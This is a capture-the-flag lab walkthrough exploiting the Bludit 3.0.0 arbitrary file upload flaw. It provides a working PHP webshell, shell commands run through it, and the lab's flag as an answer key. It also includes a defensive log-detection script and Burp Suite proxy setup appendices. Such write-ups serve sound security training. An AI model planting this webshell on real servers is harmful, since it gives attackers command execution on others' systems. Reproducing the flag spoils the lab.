Walkthrough 2

The document describes an exercise where the goal is to exploit a vulnerability in the Bludit web application version 3.0.0 to retrieve a flag. The following steps are outlined: 1. Inspect the Bludit admin interface and find an exploit for the known vulnerability. 2. Upload a PHP webshell by intercepting the request with Burp Suite. 3. Use the webshell to execute commands like searching for the flag file and reading its contents. 4. The flag "b429d4897b464de1e59dd466584bb047" is retrieved.

Uploaded by Bhavin Patel

Name: CMS I: Web to Shell

URL: https://www.ctf.live/challengedetails?cid=2

Type: WebApps

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Mission:

An attacker might gain administrative access to a web application. However, this does not
automatically mean that the web server can be compromised. Where a SaaS application is
offered to customers, it is routine to give each user admin access to their own instance of the
web application, e.g. a managed hosted WordPress site. In such a scenario, an attacker who
starts out as a managed administrative user has to figure out how to abuse the administrative
interface to get a shell on the server. In some cases, it might be possible to escalate privileges
further as well.

The web application Bludit (3.0.0) is vulnerable.

In this challenge, the attacker has administrative access to the web application and needs to
find and exploit the vulnerability.

The following username and password may be used to explore the application and/or find a
vulnerability that requires authenticated access:

Username: admin
Password: password

Objective: Exploit the vulnerability and retrieve the flag.


Solution:

Step 1: Inspect the web application.

Step 2: Search on Google for “Bludit 3.0.0 vulnerability” and look for publicly available exploits.
The Exploit-DB entry identifies the vulnerable page: the image upload in the pages editor, which
accepts an arbitrary file type.

Exploit-DB link: https://www.exploit-db.com/exploits/46060

Step 3: The user has to authenticate in order to exploit the vulnerability. Log in to the web
application. The admin portal is located at “/admin”.

URL: http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/admin/

The login credentials of the web application are provided in the challenge description.

● Username: admin
● Password: password

Dashboard:
Step 4: Click on the “New Content” link provided on the left panel.

Step 5: Create a PHP webshell.

Save the PHP script given below as shell.php. It runs whatever is passed in the “cmd” query
parameter through the system shell and returns the output wrapped in a <pre> element:

<?php
// Minimal webshell: execute the "cmd" GET parameter and return its output
$output = shell_exec($_GET["cmd"]);
echo "<pre>$output</pre>";
?>

Step 6: Configure Burp Suite and intercept the file upload request.

Check the Appendix to learn how to configure Burp Suite.

Click on the Images button:

Click on the Browse button:

Upload the webshell; the request will be intercepted by Burp Suite.

Step 7: Forward the request and check the “HTTP history” tab.

Step 8: Select the forwarded POST request and click on the Response tab.

The path of the uploaded PHP webshell is revealed in the JSON response (the “/” characters
appear escaped as “\/”, so “\/bl-content\/uploads\/shell.php” reads as
/bl-content/uploads/shell.php). Note that the upload was accepted as-is: the application neither
rejected the .php extension nor renamed the file, which is the vulnerability being exploited.

Step 9: Access the uploaded PHP script.

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.php

The page renders blank (an empty <pre> element) because no “cmd” parameter was passed.
Getting a rendered page rather than the PHP source text confirms that files under
/bl-content/uploads/ are executed as PHP by the server.

Step 10: Execute a system command by passing the “cmd” parameter.

Command: id

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.php?cmd=id

The web server process runs as the www-data user, so every command issued through the
webshell executes with that user's privileges.

Step 11: Search for the flag on the filesystem.

Command: find / -name "*flag*" 2>/dev/null

(Quoting the pattern stops the shell from expanding it against the webshell's own directory
before find sees it; 2>/dev/null hides the permission-denied errors www-data gets for most of
the filesystem.)

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.php?cmd=find / -name "*flag*" 2>/dev/null

The browser percent-encodes the spaces and quotes before sending the request. The location of
the flag is revealed.

Step 12: Retrieve the flag.

Command: cat /var/www/html/flag-b429d4897b464de1e

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.php?cmd=cat%20/var/www/html/flag-b429d4897b464de1e

Flag: b429d4897b464de1e59dd466584bb047
References:

1. Bludit (https://github.com/bludit/bludit)
2. CVE-2018-1000811 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000811)
3. Bludit Pages Editor 3.0.0 - Arbitrary File Upload (https://www.exploit-db.com/exploits/46060)
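The defender's view of Steps 6 to 12, as an added example that is not part of the walkthrough: the sequence it produces in a web server access log is a POST to the image-upload endpoint followed, from the same client, by GET requests for a .php file under /bl-content/uploads/ carrying a cmd parameter. The log lines below are constructed (common log format) to resemble that traffic; the upload endpoint name /admin/ajax/upload-images is assumed rather than taken from the page, while /bl-content/uploads/ is the directory the walkthrough shows.

```python
"""Spotting the upload-then-execute chain from Steps 6-12 in access logs.

Added example, not part of the walkthrough.  Log lines are constructed; the
upload endpoint /admin/ajax/upload-images is assumed, /bl-content/uploads/ is
the directory shown in the walkthrough.
"""
import re
import urllib.parse
from datetime import datetime

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
UPLOAD_ENDPOINT = "/admin/ajax/upload-images"      # assumed
UPLOADS_DIR = "/bl-content/uploads/"               # only images belong here
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)


def parse(line: str):
    """One log line -> dict with parsed timestamp, path and query, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["path"], _, query = e["target"].partition("?")
    e["query"] = urllib.parse.parse_qs(query)      # percent-decodes the command
    e["status"] = int(e["status"])
    return e


def detect(lines, window_s: int = 600):
    """Return (severity, client_ip, reason) for each suspicious request.

    A script executed from the uploads directory is an alert on its own
    (medium); a ?cmd= parameter makes it high; the same client having hit the
    image-upload endpoint within window_s seconds beforehand, which is exactly
    the walkthrough's sequence, makes it critical.
    """
    alerts = []
    last_upload = {}                               # client ip -> time of last upload POST
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        if e["method"] == "POST" and e["path"] == UPLOAD_ENDPOINT and e["status"] == 200:
            last_upload[e["ip"]] = e["ts"]
            continue
        if not (e["path"].startswith(UPLOADS_DIR) and SCRIPT_EXT.search(e["path"])):
            continue
        severity, reason = "medium", f"script served from uploads: {e['path']}"
        if "cmd" in e["query"]:
            severity = "high"
            reason += f" cmd={e['query']['cmd'][0]!r}"
        since = last_upload.get(e["ip"])
        if since is not None and 0 <= (e["ts"] - since).total_seconds() <= window_s:
            severity = "critical"
            reason += f" {int((e['ts'] - since).total_seconds())}s after an image upload"
        alerts.append((severity, e["ip"], reason))
    return alerts


# Constructed sample: one client following the walkthrough, one benign image
# fetch, and a second client using an already-planted shell.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2019:10:15:01 +0000] "POST /admin/login HTTP/1.1" 302 -
10.0.0.5 - - [12/Mar/2019:10:15:20 +0000] "POST /admin/ajax/upload-images HTTP/1.1" 200 87
10.0.0.5 - - [12/Mar/2019:10:15:41 +0000] "GET /bl-content/uploads/shell.php HTTP/1.1" 200 11
10.0.0.5 - - [12/Mar/2019:10:16:02 +0000] "GET /bl-content/uploads/shell.php?cmd=id HTTP/1.1" 200 70
10.0.0.5 - - [12/Mar/2019:10:16:30 +0000] "GET /bl-content/uploads/shell.php?cmd=cat%20/var/www/html/flag-b429d4897b464de1e HTTP/1.1" 200 44
10.0.0.9 - - [12/Mar/2019:10:20:00 +0000] "GET /bl-content/uploads/logo.png HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2019:10:40:00 +0000] "GET /bl-content/uploads/x.php?cmd=uname%20-a HTTP/1.1" 200 60
"""

if __name__ == "__main__":
    for severity, ip, reason in detect(SAMPLE_LOG.splitlines()):
        print(f"[{severity:8}] {ip}: {reason}")
```

The medium tier fires even without a cmd parameter (Step 9's first blank visit to shell.php), because nothing legitimate in an image directory should ever be served as a script; the server-side equivalent is to deny script execution under /bl-content/uploads/ in the web server configuration regardless of what the application lets through.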
Appendix

Appendix A: Configuration for Windows OS


A.1 Google Chrome with Burp Suite
A.2 Mozilla Firefox with Burp Suite

Appendix B: Configuration for Kali OS


B.1 Google Chrome with Burp Suite
B.2 Mozilla Firefox with Burp Suite

Appendix C: Configuration for FoxyProxy Standard plugin


C.1 FoxyProxy on Google Chrome with Burp Suite
C.2 FoxyProxy on Mozilla Firefox with Burp Suite
Appendix A

A.1 Google Chrome with Burp Suite (Windows OS)

Step 1: Open Google Chrome and navigate to the URL given below.

URL: chrome://settings

The Google Chrome Settings page will appear.

Step 2: Search for “proxy” in the search box.

Step 3: Upon clicking on “Open proxy settings”, the Windows “Internet Properties” dialog box will
appear. Click on the “LAN settings” button.

Step 4: Select the checkbox “Use a proxy server for your LAN (These settings will not apply to
dial-up or VPN connections)”, and enter “127.0.0.1” and “8080” in the “Address” and “Port”
textboxes respectively.

Click “OK” on the “Local Area Network (LAN) Settings” dialog box and close the “Internet
Properties” dialog box.

Step 5: Start Burp Suite.

Step 6: Navigate to the “Options” tab under the “Proxy” tab and verify that the “Running”
checkbox is selected for the interface “127.0.0.1:8080”.

All HTTP requests made by Google Chrome will now be intercepted by Burp Suite. For HTTPS
sites, Burp's CA certificate must additionally be installed in the browser's trust store, otherwise
certificate warnings will appear (the lab target in this exercise is plain HTTP).
A.2 Mozilla Firefox with Burp Suite (Windows OS)

Step 1: Open Mozilla Firefox and navigate to the URL given below.

URL: about:preferences

Step 2: Scroll down to the bottom of the page and click on the “Settings” button under the
“Network Settings” section.

Step 3: Enter “127.0.0.1” and “8080” in the “HTTP Proxy” and “Port” textboxes respectively.

Click on the OK button.

Step 4: Start Burp Suite.

Step 5: Navigate to the “Options” tab under the “Proxy” tab and verify that the “Running”
checkbox is selected for the interface “127.0.0.1:8080”.

All HTTP requests made by Mozilla Firefox will now be intercepted by Burp Suite.
Appendix B

B.1 Google Chrome with Burp Suite (Kali OS)

Step 1: Open Google Chrome and navigate to the URL given below.

URL: chrome://settings

The Google Chrome Settings page will appear.

Step 2: Search for “proxy” in the search box.

Step 3: Upon clicking on “Open proxy settings”, the “Network” settings window will appear.
Click on the “Network Proxy” option.

Step 4: Enter “127.0.0.1” in the “HTTP Proxy” textbox and enter 8080 as the port.

Close the dialog box.

Step 5: Start Burp Suite.

Step 6: Navigate to the “Options” tab under the “Proxy” tab and verify that the “Running”
checkbox is selected for the interface “127.0.0.1:8080”.

All HTTP/HTTPS requests made by Google Chrome will now be intercepted by Burp Suite.
B.2 Mozilla Firefox with Burp Suite (Kali OS)

Step 1: Open Mozilla Firefox and navigate to the URL given below.

URL: about:preferences

Step 2: Click on the “Advanced” tab on the left panel and then click on the “Settings” button
under the “Network” tab.

Step 3: Enter “127.0.0.1” and “8080” in the “HTTP Proxy” and “Port” textboxes respectively.

Step 4: Start Burp Suite.

Step 5: Navigate to the “Options” tab under the “Proxy” tab and verify that the “Running”
checkbox is selected for the interface “127.0.0.1:8080”.

All HTTP requests made by Mozilla Firefox will now be intercepted by Burp Suite.
Appendix C

C.1 FoxyProxy on Google Chrome with Burp Suite

Step 1: Install FoxyProxy.

The FoxyProxy Standard plugin for Google Chrome can be installed from the URL given below:

URL:
https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp?hl=en

After installing FoxyProxy, a small fox icon will appear on the right side of the address bar.

Step 2: Click on the FoxyProxy icon and click on Options.

Step 3: Click on the “Add New Proxy” button.

Step 4: Enter “127.0.0.1” in the “Host or IP Address” textbox and enter “8080” in the Port textbox.
Click on the Save button.

The configured proxy will appear in the proxies table.

Step 5: Enable the proxy.

Click on the FoxyProxy icon and select the option “Use proxy 127.0.0.1:8080 for all URLs”.

The FoxyProxy icon will change its color (in this case it is blue).

Step 6: Start Burp Suite.

Step 7: Navigate to the “Options” tab under the “Proxy” tab and verify that the “Running”
checkbox is selected for the interface “127.0.0.1:8080”.

All HTTP/HTTPS requests made by Google Chrome will now be intercepted by Burp Suite.
C.2 FoxyProxy on Mozilla Firefox with Burp Suite

Step 1: Install FoxyProxy.

The FoxyProxy Standard plugin for Mozilla Firefox can be installed from the URL given below:

URL: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

After installing FoxyProxy, a small fox icon will appear on the right side of the address bar.

Step 2: Click on the FoxyProxy icon and click on Options.

Step 3: Click on the add button on the left panel.

Step 4: Enter “127.0.0.1” in the “IP Address, DNS name, server name” textbox and enter “8080” in
the Port textbox.

Click on the Save button.

The proxy will appear in the proxies table.

Step 5: Enable the proxy.

Click on the FoxyProxy icon and select the option “Use proxy 127.0.0.1:8080 for all URLs
(ignore patterns)”.

The FoxyProxy icon will change its color (in this case it is green).

Step 6: Start Burp Suite.

Step 7: Navigate to the “Options” tab under the “Proxy” tab and verify that the “Running”
checkbox is selected for the interface “127.0.0.1:8080”.

All HTTP/HTTPS requests made by Mozilla Firefox will now be intercepted by Burp Suite.
